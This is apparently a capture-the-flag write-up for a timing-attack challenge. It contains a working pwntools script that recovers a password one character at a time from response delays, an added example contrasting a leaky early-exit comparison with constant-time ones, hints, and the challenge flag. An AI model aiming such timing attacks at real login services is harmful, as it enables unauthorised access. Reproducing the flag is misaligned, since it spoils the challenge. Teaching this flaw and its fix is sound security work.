Difficulty
85/100. To be honest, 100/100 is probably more accurate, but I don't want to give it that because I don't want to be the one who says MY CHALLENGE IS THE HARDEST, so we'll see after testing.
Category
Misc
How To Solve
This is a timing attack challenge against a password comparison. The password is compared very slowly, so by timing how long each answer takes you can brute-force the password one character at a time.
Comparing one character takes 0.1. You can measure this by sending each letter of the alphabet to the server in turn and timing the responses. The response to the letter "s" takes longer to come back because it is the first letter of the password.
Here is a solution script:
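```python
import string
import time

from pwn import *


def find(password, prevtime):
    # Try each lowercase letter as the next character of the password.
    for c in string.ascii_lowercase:
        new_pass = password + c
        print(new_pass)
        conn = remote("localhost", 3002)
        conn.recv()  # read whatever the server sends first
        t = time.time()
        conn.send((new_pass + "\n").encode())
        ans = conn.recvline(timeout=prevtime + 1)
        endtime = time.time() - t
        print(endtime)
        # A correct extra character adds about 0.1 to the response time.
        if endtime - prevtime > 0.08:
            conn.close()
            find(new_pass, endtime)
            break
        conn.close()


find("", 0)
```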
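The comparison flaw this challenge is built on, next to a version that does the same work for every guess, as an added example (not the challenge's server code, which is not shown on this page). The secret, the function names and the step counter standing in for the 0.1 per-character delay are assumptions.

```python
import hmac

SECRET = "sesame"  # constructed sample secret, not the challenge password


def leaky_compare(guess, secret=SECRET):
    """Early-exit check. Returns (match, steps); each step stands in for one
    slow per-character comparison, so response time grows with steps."""
    steps = 0
    for i, s in enumerate(secret):
        steps += 1
        if i >= len(guess) or guess[i] != s:
            return False, steps  # stops at the first mismatch: leaks the prefix
    return len(guess) == len(secret), steps


def fixed_work_compare(guess, secret=SECRET):
    """Same result, but every position is always examined."""
    g, s = guess.encode(), secret.encode()
    diff = len(g) ^ len(s)
    steps = 0
    for i in range(len(s)):
        steps += 1
        diff |= (g[i] if i < len(g) else 0) ^ s[i]
    return diff == 0, steps


def safe_compare(guess, secret=SECRET):
    """What to use in real Python code: the standard library's
    constant-time comparison (it may still reveal the length)."""
    return hmac.compare_digest(guess.encode(), secret.encode())


def leak_profile(guesses, compare=leaky_compare):
    """Work done per guess, i.e. what an observer timing responses sees."""
    return {g: compare(g)[1] for g in guesses}


if __name__ == "__main__":
    probes = ["a", "s", "sa", "se", "sesame"]
    print("early exit:", leak_profile(probes))
    print("fixed work:", leak_profile(probes, fixed_work_compare))
```

With the early-exit check the step count rises by one for each correct leading character, which is the signal the solution script measures; with the fixed-work check it is the same for every guess.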
Hints
- I hope you paid attention to the Automata and Computability course!
- It might be useful information that my friend is German.
Flag
IGCTF{THANKYOUALANTURINGITCOULDNOTHAVEBEENEASY}